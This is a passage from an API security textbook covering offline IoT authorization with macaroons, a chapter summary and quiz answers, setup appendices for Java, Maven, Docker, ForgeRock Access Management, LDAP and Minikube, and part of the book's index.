evening event at a luxury hotel in a secluded location with no cellular network
coverage. The hotel offers valet parking, but you don’t trust the attendant, so you
only want to allow them limited ability to drive the expensive car you hired.
Because your access token is a macaroon, you can simply append caveats to it
restricting the token to expire in 10 minutes and only allow the car to be driven
in a quarter-mile radius of the hotel.
Macaroons are a great solution for offline authorization because caveats can be
added by devices at any time without any coordination and can then be locally
verified by devices without needing to contact a central service. Third-party
caveats can also work well in an IoT application, because they require the client
to obtain proof of authorization from the third-party API. This authorization can
be obtained ahead of time by the client and then verified by the device by checking
the discharge macaroon, without needing to directly contact the third party.
Answers to pop quiz questions
1  False. The PSK can be any sequence of bytes and may not be a valid string.
2  d. The ID is authenticated during the handshake, so you should only trust it
   after the handshake completes.
3  d. Entity authentication requires that messages are fresh and haven’t been
   replayed.
4  b, c, and d.
5  a.
6  c. The device authorization grant.
Pop quiz

6  Which OAuth authorization grant can be used on devices that lack user input
   features?
   a  The client credentials grant
   b  The authorization code grant
   c  The device authorization grant
   d  The resource owner password grant
The answer is at the end of the chapter.

Summary
■ Devices can be identified using credentials associated with a device profile.
  These credentials could be an encrypted pre-shared key or a certificate
  containing a public key for the device.
■ Device authentication can be done at the transport layer, using facilities in
  TLS, DTLS, or other secure protocols. If there is no end-to-end secure
  connection, then you’ll need to implement your own authentication protocol.
■ End-to-end device authentication must ensure freshness to prevent replay
  attacks. Freshness can be achieved with timestamps, nonces, or
  challenge-response protocols. Preventing replay requires storing per-device
  state, such as a monotonically increasing counter or recently used nonces.
■ REST APIs can prevent replay by making use of authenticated request objects
  that contain an ETag that identifies a specific version of the resource being
  acted on. The ETag should change whenever the resource changes to prevent
  replay of previous requests.
■ The OAuth2 device grant can be used by devices with no input capability to
  obtain access tokens authorized by a user. The ACE-OAuth working group at the
  IETF is developing specifications that adapt OAuth2 for use in constrained
  environments.
■ Devices may not always be able to connect to central cloud services. Offline
  authentication and access control allow devices to continue to operate securely
  when disconnected. Self-contained token formats can include credentials and
  policies to ensure authority isn’t exceeded, and proof-of-possession (PoP)
  constraints can be used to provide stronger security guarantees.
appendix A
Setting up Java and Maven
The source code examples in this book require several prerequisites to be installed
and configured before they can be run. This appendix describes how to install and
configure those prerequisites. The following software is required:

■ Java 11
■ Maven 3
A.1 Java and Maven
A.1.1 macOS
On macOS, the simplest way to install the prerequisites is using Homebrew
(https://brew.sh). Homebrew is a package manager that simplifies installing other
software on macOS. To install Homebrew, open a Terminal window (Finder >
Applications > Utilities > Terminal) and type the following command:

/usr/bin/ruby -e "$(curl -fsSL
➥ https://raw.githubusercontent.com/Homebrew/install/master/install)"

This script will guide you through the remaining steps to install Homebrew. If you
don’t want to use Homebrew, all the prerequisites can be manually installed
instead.
INSTALLING JAVA 11
If you have installed Homebrew, then the latest Java can be installed with the
following simple command:

brew cask install adoptopenjdk
TIP   Some Homebrew packages are marked as casks, which means that they are
binary-only native applications rather than installed from source code. In most
cases, this just means that you use brew cask install rather than brew install.
The latest version of Java should work with the examples in this book, but you can
tell Homebrew to install version 11 by running the following commands:

brew tap adoptopenjdk/openjdk
brew cask install adoptopenjdk11

This will install the free AdoptOpenJDK distribution of Java into
/Library/Java/JavaVirtualMachines/adoptopenjdk-11.0.6.jdk. If you did not install
Homebrew, then binary installers can be downloaded from https://adoptopenjdk.net.
Once Java 11 is installed, you can ensure that it is used by running the
following command in your Terminal window:

export JAVA_HOME=$(/usr/libexec/java_home -v11)

This instructs Java to use the OpenJDK commands and libraries that you just
installed. To check that Java is installed correctly, run the following command:

java -version

You should see output similar to the following:

openjdk version "11.0.6" 2018-10-16
OpenJDK Runtime Environment AdoptOpenJDK (build 11.0.1+13)
OpenJDK 64-Bit Server VM AdoptOpenJDK (build 11.0.1+13, mixed mode)
INSTALLING MAVEN
Maven can be installed from Homebrew using the following command:

brew install maven

Alternatively, Maven can be manually installed from https://maven.apache.org. To
check that you have Maven installed correctly, type the following at a Terminal
window:

mvn -version

The output should look like the following:

Apache Maven 3.5.4 (1edded0938998edf8bf061f1ceb3cfdeccf443fe; 2018-06-
17T19:33:14+01:00)
Maven home: /usr/local/Cellar/maven/3.5.4/libexec
Java version: 11.0.1, vendor: AdoptOpenJDK, runtime: /Library/Java/
JavaVirtualMachines/adoptopenjdk-11.0.1.jdk/Contents/Home
Default locale: en_GB, platform encoding: UTF-8
OS name: "mac os x", version: "10.14.2", arch: "x86_64", family: "mac"
A.1.2 Windows
On Windows 10, you can install the dependencies using Homebrew using the Windows
Subsystem for Linux (WSL). To install WSL, go to
https://docs.microsoft.com/en-us/windows/wsl/about and follow the instructions. You
can then follow the instructions for installing Homebrew for Linux in section
A.1.3.
A.1.3 Linux
On a Linux system, you can either install the dependencies using your
distribution’s package manager, or you can install Homebrew and follow the same
instructions for macOS to install Java and Maven. To install Homebrew on Linux,
follow the instructions at https://docs.brew.sh/Homebrew-on-Linux.
A.2 Installing Docker
Docker (https://www.docker.com) is a platform for building and running Linux
containers. Some of the software used in the examples is packaged using Docker, and
the Kubernetes examples in chapters 10 and 11 require a Docker installation.
Although Docker can be installed through Homebrew and other package managers,
the Docker Desktop installation tends to work better and is easier to use. You can
download the installer for each platform from the Docker website or using the
following links:

■ Windows: http://mng.bz/qNYA
■ macOS: https://download.docker.com/mac/stable/Docker.dmg
■ Linux installers can be found under
  https://download.docker.com/linux/static/stable/

After downloading the installer for your platform, run the file and follow the
instructions to install Docker Desktop.
A.3 Installing an Authorization Server
For the examples in chapter 7 and later chapters, you’ll need a working OAuth2
Authorization Server (AS). There are many commercial and open source AS
implementations to choose from. Some of the later chapters use cutting-edge
features that are currently only implemented in commercial AS implementations. I’ve
therefore provided instructions for installing an evaluation copy of a commercial
AS, but you could also use an open source alternative for many of the examples,
such as MITREid Connect (http://mng.bz/7Gym).
A.3.1 Installing ForgeRock Access Management
ForgeRock Access Management (https://www.forgerock.com) is a commercial AS (and a
lot more besides) that implements a wide variety of OAuth2 features.
NOTE   The ForgeRock software is provided for evaluation purposes only. You’ll need
a commercial license to use it in production. See the ForgeRock website for
details.
SETTING UP A HOST ALIAS
Before running AM, you should add an entry into your hosts file to create an alias
hostname for it to run under. On macOS and Linux you can do this by editing the
/etc/hosts file, for example, by running:

sudo vi /etc/hosts

TIP   If you’re not familiar with vi, use your editor of choice. Hit the Escape key
and then type :q! and hit Return to exit vi if you get stuck.

Add the following line to the /etc/hosts file and save the changes:

127.0.0.1  as.example.com

There must be at least two spaces between the IP address and the hostname.
On Windows, the file is in C:\Windows\System32\Drivers\etc\hosts. You can create
the file if it doesn’t already exist. Use Notepad or another plain text editor to
edit the hosts file.
WARNING   Windows 8 and later versions may revert any changes you make to the
hosts file to protect against malware. Follow the instructions on this site to
exclude the hosts file from Windows Defender: http://mng.bz/mNOP.
RUNNING THE EVALUATION VERSION
Once the host alias is set up, you can run the evaluation version of ForgeRock
Access Management (AM) by running the following Docker command:

docker run -i -p 8080:8080 -p 50389:50389 \
    -t gcr.io/forgerock-io/openam:6.5.2

This will download and run a copy of AM 6.5.2 in a Tomcat servlet environment
inside a Docker container and make it available to access over HTTP on the local
port 8080.
TIP   The storage for this image is non-persistent and will be deleted when you
shut it down. Any configuration changes you make will not be saved.
Once the download and startup are complete, it will display a lot of console
output finishing with a line like the following:

10-Feb-2020 21:40:37.320 INFO [main]
➥ org.apache.catalina.startup.Catalina.start Server startup in
➥ 30029 ms

You can now continue the installation by navigating to http://as.example.com:8080/
in a web browser. You will see an installation screen as in figure A.1. Click on
the link to Create Default Configuration to begin the install.
You’ll then be asked to accept the license agreement, so scroll down and tick the
box to accept and click continue. The final step in the installation is to pick an
administrator password. Because this is just a demo environment on your local
machine, choose any value you like that is at least eight characters long. Make a
note of the password you’ve chosen. Type the password into both boxes and then
click Create Configuration to finalize the installation. This may take a few
minutes as it installs the components of the server into the Docker image.
After the installation has completed, click on the link to Proceed to Login and
then enter the password you chose during the installer with the username amadmin.
You’ll end up in the AM admin console, shown in figure A.2. Click on the Top Level
Realms box to get to the main dashboard page, shown in figure A.3.
On the main dashboard, you can configure OAuth2 support by clicking on the
Configure OAuth Provider button, as shown in figure A.3. This will then give you
the option to configure OAuth2 for various use cases. Click Configure OpenID
Connect and then click the Create button in the top right-hand side of the screen.
After you’ve configured OAuth2 support, you can use curl to query the OAuth2
configuration document by opening a new terminal window and running:

curl http://as.example.com:8080/oauth2/.well-known/
➥ openid-configuration | jq

TIP   If you don’t have curl or jq installed already, you can install them by
running brew install curl jq on Mac or apt-get install curl jq on Linux. On
Windows, they can be downloaded from https://curl.haxx.se and
https://stedolan.github.io/jq/.
Figure A.1   The ForgeRock AM installation screen. Click on the link to Create
Default Configuration.

Figure A.2   The AM admin console home screen. Click the Top Level Realms box.

Figure A.3   In the main AM dashboard page, click Configure OAuth Provider to set
up OAuth2 support. Later, you will configure an OAuth2 client under the
Applications page in the sidebar.
The JSON output includes several useful endpoints that you’ll need for the examples
in chapter 7 and later. Table A.1 summarizes the relevant values from the
configuration. See chapter 7 for a description of these endpoints.

Table A.1   ForgeRock AM OAuth2 endpoints

Endpoint name                            URI
Token endpoint                           http://as.example.com:8080/oauth2/access_token
Introspection endpoint                   http://as.example.com:8080/oauth2/introspect
Authorization endpoint                   http://as.example.com:8080/oauth2/authorize
UserInfo endpoint                        http://as.example.com:8080/oauth2/userinfo
JWK Set URI                              http://as.example.com:8080/oauth2/connect/jwk_uri
Dynamic client registration endpoint     http://as.example.com:8080/oauth2/register
Revocation endpoint                      http://as.example.com:8080/oauth2/token/revoke

To register an OAuth2 client, click on Applications in the left-hand sidebar, then
OAuth2, and then Clients. Click the New Client button and you’ll see the form for
basic client details shown in figure A.4. Give the client the ID “test” and a
client secret. You can choose a weak client secret for development purposes; I use
“password.” Finally, you can configure some scopes that the client is permitted to
ask for.

Figure A.4   Adding a new client. Give the client a name and a client secret. Add
some permitted scopes. Finally, click the Create button to create the client.

TIP   By default, AM only supports the basic OpenID Connect scopes: openid,
profile, email, address, and phone. You can add new scopes by clicking on Services
in the left-hand sidebar, then OAuth2 Provider. Then click on the Advanced tab and
add the scopes to the Supported Scopes field and click Save Changes. The scopes
that are used in the examples in this book are create_space, post_message,
read_message, list_messages, delete_message, and add_member.
After you’ve created the client, you’ll be taken to the advanced client properties page.
There are a lot of properties! You don’t need to worry about most of them, but you
should allow the client to use all the authorization grant types covered in this book.
Click on the Advanced tab at the top of the page, and then click inside the Grant
Types field on the page as shown in figure A.5. Add the following grant types to the
field and then click Save Changes:
■ Authorization Code
■ Resource Owner Password Credentials
■ Client Credentials
■ Refresh Token
■ JWT Bearer
■ Device Code
Figure A.5 Click on the Advanced tab and then in the Grant Types field to configure the allowed grant types for the client.
You can check that everything is working by getting an access token for the client by
running the following curl command in a terminal:
curl -d 'grant_type=client_credentials&scope=openid' \
-u test:password http://as.example.com:8080/oauth2/access_token
You’ll see output like the following:
{"access_token":"MmZl6jRhMoZn8ZNOXUAa9RPikL8","scope":"openid","id_token":"ey
J0eXAiOiJKV1QiLCJraWQiOiJ3VTNpZklJYUxPVUFSZVJCL0ZHNmVNMVAxUU09IiwiYWxnIjoiUlM
yNTYifQ.eyJhdF9oYXNoIjoiTXF2SDY1NngyU0wzc2dnT25yZmNkZyIsInN1YiI6InRlc3QiLCJhd
WRpdFRyYWNraW5nSWQiOiIxNDViNjI2MC1lNzA2LTRkNDctYWVmYy1lMDIzMTQyZjBjNjMtMzg2MT
kiLCJpc3MiOiJodHRwOi8vYXMuZXhhbXBsZS5jb206ODA4MC9vYXV0aDIiLCJ0b2tlbk5hbWUiOiJ
pZF90b2tlbiIsImF1ZCI6InRlc3QiLCJhenAiOiJ0ZXN0IiwiYXV0aF90aW1lIjoxNTgxMzc1MzI1
LCJyZWFsbSI6Ii8iLCJleHAiOjE1ODEzNzg5MjYsInRva2VuVHlwZSI6IkpXVFRva2VuIiwiaWF0I
joxNTgxMzc1MzI2fQ.S5Ib5Acj5hZ7se9KvtlF2vpByG_0XAWKSg0-
Zy_GZmpatrox0460u5HYvPdOVl7qqP-
AtTV1ah_2aFzX1qN99ituo8fOBIpKDTyEgHZcxeZQDskss1QO8ZjdoE-JwHmzFzIXMU-5u9ndfX7-
-Wu_QiuzB45_NsMi72ps9EP8iOMGVAQyjFG5U6jO7jEWHUKI87wrv1iLjaFUcG0H8YhUIIPymk-
CJUgwtCBzESQ1R7Sf-6mpVgAjHA-eQXGjH18tw1dRneq-kY-D1KU0wxMnw0GwBDK-
LudtCBaETiH5T_CguDyRJJotAq65_MNCh0mhsw4VgsvAX5Rx30FQijXjNw","token_type":"Bea
rer","expires_in":3599}
A.4 Installing an LDAP directory server
An LDAP directory server is needed for some of the examples in chapter 8.
TIP Apache Directory Studio is a useful tool for browsing LDAP directories. It can be downloaded from https://directory.apache.org/studio/.
A.4.1 ForgeRock Directory Services
If you’ve installed ForgeRock AM using the instructions in section A.3.1, you already
have an LDAP directory server running on port 50389, because this is what AM uses as
its internal database and user repository. You can connect to the directory using the
following details:
■ URL: ldap://localhost:50389/
■ Bind DN: cn=Directory Manager
■ Bind password: the admin password you specified when installing AM
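If you have the OpenLDAP command-line tools installed, you can verify these connection details by querying the root DSE. This is just a quick sanity check, not a required step; substitute the admin password you chose during installation:

# Bind as cn=Directory Manager and read the root DSE
ldapsearch -H ldap://localhost:50389 \
  -D "cn=Directory Manager" -w 'your-admin-password' \
  -b "" -s base "(objectclass=*)" namingContexts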
Appendix B Setting up Kubernetes
The example code in chapters 10 and 11 requires a working Kubernetes installation. In this appendix, you’ll find instructions on installing a Kubernetes development environment on your own laptop or desktop.
B.1 MacOS
Although Docker Desktop for Mac comes with a functioning Kubernetes environment, the examples in the book have only been tested with Minikube running on VirtualBox, so I recommend you install these components to ensure compatibility.
NOTE The instructions in this appendix assume you have installed Homebrew. Follow the instructions in appendix A to configure Homebrew before continuing.
The instructions require MacOS 10.12 (Sierra) or later.
B.1.1 VirtualBox
Kubernetes uses Linux containers as the units of execution on a cluster, so on operating systems other than Linux you’ll need to install a virtual machine to run a Linux guest environment. The examples have been tested with Oracle’s VirtualBox (https://www.virtualbox.org), which is a freely available virtualization product that runs on MacOS.
NOTE Although the base VirtualBox package is open source under the terms of the GPL, the VirtualBox Extension Pack uses different licensing terms. See https://www.virtualbox.org/wiki/Licensing_FAQ for details. None of the examples in the book require the extension pack.
You can install VirtualBox either by downloading an installer from the VirtualBox
website, or by using Homebrew by running:
brew cask install virtualbox
NOTE After installing VirtualBox you may need to manually approve the installation of the kernel extension it requires to run. Follow the instructions on Apple’s website: http://mng.bz/5pQz.
B.1.2 Minikube
After VirtualBox is installed you can install a Kubernetes distribution. Minikube
(https://minikube.sigs.k8s.io/docs/) is a single-node Kubernetes cluster that you can
run on a developer machine. You can install Minikube using Homebrew by running:
brew install minikube
Afterward, you should configure Minikube to use VirtualBox as its virtual machine by
running the following command:
minikube config set vm-driver virtualbox
You can then start Minikube by running:

# --kubernetes-version pins the version of Kubernetes used in the book;
# --memory gives the VM 4GB of memory.
minikube start \
  --kubernetes-version=1.16.2 \
  --memory=4096
TIP A running Minikube cluster can use a lot of power and memory. Stop Minikube when you’re not using it by running minikube stop.
Installing Minikube with Homebrew will also install the kubectl command-line application required to configure a Kubernetes cluster. You can check that it’s installed correctly by running:
kubectl version --client --short
You should see output like the following:
Client Version: v1.16.3
If kubectl can’t be found, then make sure that /usr/local/bin is in your PATH by
running:
export PATH=$PATH:/usr/local/bin
You should then be able to use kubectl.
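Once Minikube has started, you can also confirm that the cluster itself is reachable. The exact output varies, but you should see the single Minikube node in the Ready state, something like the following:

kubectl get nodes

NAME       STATUS   ROLES    AGE   VERSION
minikube   Ready    master   2m    v1.16.2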
B.2 Linux
Although Linux is the native environment for Kubernetes, it’s still recommended to run Minikube in a virtual machine for maximum compatibility. The examples have been tested with VirtualBox on Linux too, so that is the recommended option.
B.2.1 VirtualBox
VirtualBox for Linux can be installed by following the instructions for your Linux distribution at https://www.virtualbox.org/wiki/Linux_Downloads.
B.2.2 Minikube
Minikube can be installed by direct download by running the following command:
curl \
  -LO https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64 \
  && sudo install minikube-linux-amd64 /usr/local/bin/minikube
Afterward, you can configure Minikube to use VirtualBox by running:
minikube config set vm-driver virtualbox
You can then follow the instructions at the end of section B.1.2 to ensure Minikube
and kubectl are correctly installed.
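Note that installing Minikube by direct download doesn’t install kubectl for you. If kubectl isn’t already present, one option (a sketch, assuming the v1.16.3 client shown elsewhere in this appendix) is to download the release binary directly and install it:

curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.16.3/bin/linux/amd64/kubectl
sudo install kubectl /usr/local/bin/kubectl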
TIP If you want to install Minikube using your distribution’s package manager, see the instructions at https://minikube.sigs.k8s.io/docs/start and click on the Linux tab for various distributions.
B.3 Windows
B.3.1 VirtualBox
VirtualBox for Windows can be installed using the installer file from https://www.virtualbox.org/wiki/Downloads.
B.3.2 Minikube
A Windows installer for Minikube can be downloaded from https://storage.googleapis.com/minikube/releases/latest/minikube-installer.exe. Follow the on-screen instructions after downloading and running the installer.
Once Minikube is installed, open a terminal window, and run:
minikube config set vm-driver virtualbox
to configure Minikube to use VirtualBox.
index
A
A128CBC-HS256 method 203
AAA (authentication, authorization, and audit
logging) 22
ABAC (attribute-based access control) 282–293
best practices for 291–293
combining decisions 284
distributed policy enforcement and
XACML 290–291
implementing decisions 285, 288
policy agents and API gateways 289–290
ABACAccessController class 286, 288
Accept header 57
acceptable inputs 50
access control 22–23, 87–97
adding new members to Natter space 94–95
avoiding privilege escalation attacks 95–97
enforcing 92–94
enforcing authentication 89
offline 520–521
sharing capability URIs 317–318
access log 87
Access Management (AM) product,
ForgeRock 516
access tokens 239–258
JWTs 249–256
letting AS decrypt tokens 258
securing HTTPS client configuration 245–247
token introspection 239–244
token revocation 248
Access-Control-Allow-Credentials header 150, 166,
180
Access-Control-Allow-Headers header 150
Access-Control-Allow-Methods header 150
Access-Control-Allow-Origin header 150, 154
Access-Control-Expose-Headers header 150
Access-Control-Max-Age header 150
Access-Control-Request-Headers 148
Access-Control-Request-Method header 148
access_denied status code 516
access_token parameter 301, 303, 306
accountability, audit logging for 82–87
ACE-OAuth (Authorization for Constrained Environments using OAuth2) 511–517
ACLs (access control lists) 90–92, 267
acr claim 262
acr_values parameter 262
act claim 431, 433
active field 241
actor_token parameter 432
actor_token_type parameter 432
add_first_party_caveat method 326
addMember method 94–96, 278
add_third_party_caveat method 329
admin role 275
AEAD (authenticated encryption with associated
data) algorithms 202
AES (Advanced Encryption Standard) 196
AES-CCM (Counter with CBC-MAC)
constructor 456
after filter 37
afterAfter() method 37, 54, 59
alg attribute 189
alg header 188–189, 201
algorithm header 188–189
allow lists 50, 210
allowPrivilegeEscalation 347
AM (Access Management) product,
ForgeRock 516
ambient authority 299
amr claim 262
API gateways 10, 289–290
API keys 384–385
API security 3–26
analogy for 4–6
defined 6–8
elements of 12–18
assets 13–14
environments and threat models 16–18
security goals 14–16
injection attacks 39–47
mitigating SQL injection with
permissions 45–47
preventing 43–45
input validation 47–51
Natter API 27–33
implementation 29
initializing database 32–33
overview 28–29
setting up project 30–31
producing safe output 53–61
exploiting XSS Attacks 54–57
implementing protections 58
preventing XSS 58
REST API 34–35
creating new space 34–35
wiring up endpoints 36–39
secure development 27–61
security areas 8–12
security mechanisms 19–26
access control and authorization 22–23
audit logging 23–24
encryption 20
identification and authentication
21–22
rate-limiting 24–26
styles 7–8
typical deployment 10–12
APIs
internet of things (IoT) 488–496, 522
authenticating devices 489–496
end-to-end authentication 510
OAuth2 for constrained environments
511–517
offline access control 518–521
passing ID tokens to 264–266
apiVersion attribute 345
App class 30
appData buffer 445
application data transmission phase 397
application server 10
application/json 37
Application-layer DoS attacks (layer-7) 65
AppSec (Application security) 8
AppTest class 30
ARP spoofing attack 369
AS (Authorization Server) 386–387, 512
decrypting tokens 258
installing 525–531
assertion parameter 395
assertions 391
assets 13–14
associated data 496
asymmetric cryptography 250
at rest encryption 20
at_hash claim 263
AtomicInteger class 508
attributes, sensitive
encrypting 195–205
protecting 177–180
aud claim 187, 191, 253, 394
audience parameter 432
audit logging 19, 23–24, 82–87
audit logs, defined 6
AuditController interface 114
auditRequestEnd method 84
auditRequestStart method 84
authenticate() method 269, 404
authenticated encryption 197
AuthenticatedTokenStore interface 207–208, 323
authentication 21–22
defined 19
enforcing 89
factors 21–22
internet of things (IoT) devices for APIs 489–496
device certificates 492
identifying devices 489–492
with TLS connection 492–496
offline user 518–520
to prevent spoofing 70–77
authenticating users 75–77
creating password database 72–74
HTTP Basic authentication 71
registering users in Natter API 74–75
secure password storage with Scrypt 72
token-based 109–115
implementing token-based login 112–115
modern 146–180
token store abstraction 111–112
authentication, authorization, and audit logging
(AAA) 22
authorization 19, 22
authorization code grant 228–238
hardening code exchange with PKCE 236–237
redirect URIs for different types of client
235–236
refresh tokens 237–238
authorization endpoint 228, 529
Authorization for Constrained Environments
using OAuth2 (ACE-OAuth) 511–517
Authorization header 88, 163
authorization_pending 516
auth_time claim 262
auth-tls-pass-certificate-to-upstream 402
availability 14, 64–69
azp claim 262, 265
B
-b option 125
badRequest method 53
base image 341–342
batch attack 202
BcTlsCrypto 460, 462
Bearer authentication scheme 160–162
bearer token 160
before filter 89
before() method 58, 92, 124, 153, 288, 307
biometric factors 21
BLE (Bluetooth Low-Energy) 440, 520
block cipher 196
blocking URLs 363
blocklist 50, 210
boolean argument 116, 283
botnets 64
BREACH attack 205
brew cask install adoptopenjdk command 523
brew cask install adoptopenjdk11 command 524
brew cask install virtualbox command 533
brew install linkerd command 372
brew install maven command 524
brew install minikube command 533
brew tap adoptopenjdk/openjdk command 524
browser-based clients, capability URIs for 311–312
brute-force attacks 72, 96, 202
buffer overflow attacks 48
buffer overrun 48
BUFFER_OVERFLOW 448
BUFFER_UNDERFLOW 448
build section 349
By field 407
ByteBuffer.allocateDirect() method 483
C
-c option 124
- -cacert option 81
Cache-Control header 58
capabilities 22, 295, 347
capability URIs
combining capabilities with identity 314–315
defined 300
for browser-based clients 311–312
hardening 315–318
in Natter API 303–307
returning capability URIs 305–306
validating capabilities 306–307
REST APIs and 299–302
capability-based access control 22
capability-based security 331
macaroons 319–330
contextual caveats 321
first-party caveats 325–328
macaroon token store 322–324
third-party caveats 328–330
REST and 297–318
capabilities as URIs 299–302
capability URIs for browser-based clients
311–312
combining capabilities with identity 314–315
hardening capability URIs 315–318
Hypertext as Engine of Application State
(HATEOAS) 308–311
using capability URIs in Natter API 303–307
CapabilityController 304–306, 312, 324
CAs (certificate authorities) 80, 245, 369, 397,
443, 479
CAT (Crypto Auth Tokens) 428
cat command 295
caveats
contextual 321
first-party 325–328
third-party 328–330
answers to exercises 330
creating 329–330
CBC (Cipher Block Chaining) 201
CBOR (Concise Binary Object
Representation) 469, 496
CBOR Object Signing and Encryption
(COSE) 468–474, 496, 499
CCM mode 455
Cert field 407
certificate authorities (CAs) 80, 245, 369, 397,
443, 479
certificate chain 370, 397
Certificate message 397
certificate-bound access tokens 410–414
CertificateFactory 402
certificate.getEncoded() method 411
CertificateRequest message 398–399
certificates 80, 397
CertificateVerify message 398
cert-manager 381
ChaCha20-Poly1305 cipher suites 456
Chain field 407
chain key 483
chaining key 483
challenge-response protocol 497
c_hash claim 263
checkDecision method 288
checking URLs 363
checkPermitted method 286
Chooser API 297
chosen ciphertext attack 197
CIA Triad 14
Cipher Block Chaining (CBC) 201
Cipher object 421
cipher suites
for constrained devices 452–457
supporting raw PSK 463–464
ciphers 195
CipherSweet library 178
ciphertext 195
claims, authenticating 21
Class.getResource() method 33
CLI (command-line interface) 372
client certificate authentication 399–401
client credentials 227
client credentials grant 228, 385, 387–388
client secrets 227
client_assertion parameter 394–395
client_credentials grant 386
client_id parameter 234, 242, 409, 513
clients
authenticating using JWT bearer grant 391–393
capability URIs for browser-based 311–312
implementing DTLS 443–450
managing service credentials 415–428
avoiding long-lived secrets on disk 423–425
key and secret management services 420–422
key derivation 425–428
Kubernetes secrets 415–420
of PSK 462–463
redirect URIs for 235–236
storing token state on 182–183
types of 227–228
client_secret_basic method 386
close-notify alert 449
closeOutbound() method 449
cnf claim 411
cnf field 412
CoAP (Constrained Application Protocol) 442,
499, 509
code challenge 236
code parameter 234
collision domains 368
collision resistance 130
Command-Query Responsibility Segregation
(CQRS) 178
Common Context 499
compareAndSet method 508
Concise Binary Object Representation (CBOR)
469, 496
confidential clients 227
confidentiality 14
ConfidentialTokenStore 207, 304, 323
confirmation key 411
confirmation method 411
confused deputy attacks 295, 299
connect() method 449, 460, 462
connected channels 448–449
connected TVs 512
constant time 477
Constrained Application Protocol (CoAP) 442,
499, 509
constrained devices 440
Consumer IoT 440
container images 341
container, Docker
building H2 database as 341–345
building Natter API as 349–353
Content-Security-Policy (CSP) 58, 169
Content-Type header 57
contextual caveats 321
control plane 371–372
controller objects 34
Cookie header 115
cookies
security attributes 121–123
tokens without 154–169
Bearer authentication scheme 160–162
deleting expired tokens 162–163
storing token state in database 155–160
storing tokens in Web Storage 163–166
updating CORS filter 166
XSS attacks on Web Storage 167–169
CookieTokenStore method 118–120, 124, 133–134,
136, 159, 171, 208, 315, 317
CORS (cross-origin resource sharing) 105–106
allowing cross-domain requests with 147–154
adding CORS headers to Natter API 151–154
CORS headers 150–151
preflight requests 148
defined 147
updating filter 166
COSE (CBOR Object Signing and
Encryption) 468–474, 496, 499
Counter Mode (CTR) 196
cp command 295
CQRS (Command-Query Responsibility
Segregation) 178
create method 239
CREATE USER command 46
createEngine() method 444
createSpace method 34, 40, 44, 50, 77, 91, 102,
104, 142, 163, 278, 305–306, 309, 319
createUri method 305
credentials attribute 21, 103
credentials field 153
CRIME attack 205
CRLs (certificate revocation lists) 369
cross-origin requests 106
Crypto Auth Tokens (CAT) 428
CryptoBox algorithm 474, 496, 510
cryptographic agility 188–189
cryptographically bound tokens 130
cryptographically secure hash function 130
cryptographically-secure pseudorandom number
generator (CSPRNG) 201
cryptography 9
Crypto.hash() method 462
CSP (Content-Security-Policy) 58, 169
CSPRNG (cryptographically-secure pseudorandom number generator) 201
CSRF (Cross-Site Request Forgery) attacks 125–138
double-submit cookies for Natter API 133–138
hash-based double-submit cookies 129–133
SameSite cookies 127–129
csrfToken cookie 141–142, 164
CTR (Counter Mode) 196
cut utility 327
D
DAC (discretionary access control) 223, 267
data encryption key (DEK) 421
data plane 372
Database object 33–34, 37
Database.forDataSource() method 33
databases
for passwords 72–74
initializing Natter API 32–33
storing token state in 155–160
DatabaseTokenStore 155–156, 158–159, 171,
174–175, 177–178, 183, 208, 210–211, 213,
304, 322
dataflow diagrams 17
Datagram TLS (DTLS) 441–452, 488
DatagramChannel 447, 449, 451
DataSource interface 33, 46
DBMS (database management system) 17–18
DDoS (distributed DoS) attack 64
Decision class 283–284, 287
decision global variable 288
decodeCert method 413
decrypt() method 478
decryptToString() method 198
default permit strategy 284
defense in depth 66
DEK (data encryption key) 421
delegated authorization 223
delegation semantics 431
DELETE methods 289
deleting expired tokens 162–163
denial of service 18
deny() method 284, 286, 288
description property 354
developer portal 384
device authorization grant 512–516
Device class 491
device code 513
device flow grant 228, 512
device onboarding 490
DeviceIdentityManager class 493
devices
authenticating with TLS connection 492–496
device certificates 492
identifiers 489–492
dictionary attacks 72, 96
differential power analysis 477
Diffie-Hellman key agreement 485
DirectDecrypter 204
DirectEncrypter object 203
discharge macaroons 328
discretionary access control (DAC) 223, 267
Distinguished Name (DN) 272, 402
distributed DoS (DDoS) attack 64
distributed policy enforcement 290–291
distroless base image, Google 342
DN (Distinguished Name) 272, 402
-dname option 391
DNS (Domain Name System) 64
DNS amplification attacks 64
DNS cache poisoning attack 369
DNS field 407
DNS rebinding attacks 366–368
Docker
containers
building H2 database as 341–345
building Natter API as 349–353
installing 525
Docker registry secret 416
Dockerfile 342
doc.location() method 354
document.cookie field 140, 142
document.domain field 165
Domain attribute 121
Domain Name System (DNS) 64
domain-specific language (DSL) 285
DOM-based XSS attacks 54, 169
DoS (denial of service) attacks 13, 21, 24–25, 64
drag ‘n’ drop clickjacking attack 57
DroolsAccessController class 287
DROP TABLE command 42, 47
DSL (domain-specific language) 285
DTLS (Datagram TLS) 441–452, 488
DTLSClientProtocol 462
DtlsDatagramChannel class 448–449, 451, 457,
460
DTLSServerProtocol 461
DTLSTransport 461–462
Duration argument 303
duty officer 275
Dynamic client registration endpoint 529
dynamic groups 272
dynamic roles 280–281
E
ECB (Electronic Code Book) 196
ECDH (Elliptic Curve Diffie-Hellman) 245, 452,
472
ECDHE-RSA-AES256-SHA384 452
ECDH-ES algorithm 257
ECDH-ES encryption 256
ECDH-ES+A128KW algorithm 257
ECDH-ES+A192KW algorithm 257
ECDH-ES+A256KW algorithm 257
ECDSA signatures 255
ECIES (Elliptic Curve Integrated Encryption
Scheme) 257
ECPrivateKey type 391
EdDSA (Edwards Curve Digital Signature Algorithm) signatures 255
EEPROM (electrically erasable programmable
ROM) 480
effective top-level domains (eTLDs) 128
egress 375
EJBs (Enterprise Java Beans) 7
EK (Endorsement Key) 481
electrically erasable programmable ROM
(EEPROM) 480
Electronic Code Book (ECB) 196
elevation of privilege 18, 95
Elliptic Curve Diffie-Hellman (ECDH) 245, 452,
472
Elliptic Curve Integrated Encryption Scheme
(ECIES) 257
EmptyResultException 51
enc header 189, 201
encKey.getEncoded() method 200
encoding headers with end-to-end security 509–510
encrypt() method 478
EncryptedJWT object 203
EncryptedJwtTokenStore 205, 208, 211
EncryptedTokenStore 197–200, 205–206, 208
encryption 19–20, 63, 203
OSCORE message 504–506
private data 78–82
enabling HTTPS 80–81
strict transport security 82
sensitive attributes 195–205
authenticated encryption 197
authenticated encryption with NaCl 198–200
encrypted JWTs 200–202
Encrypt-then-MAC (EtM) 197
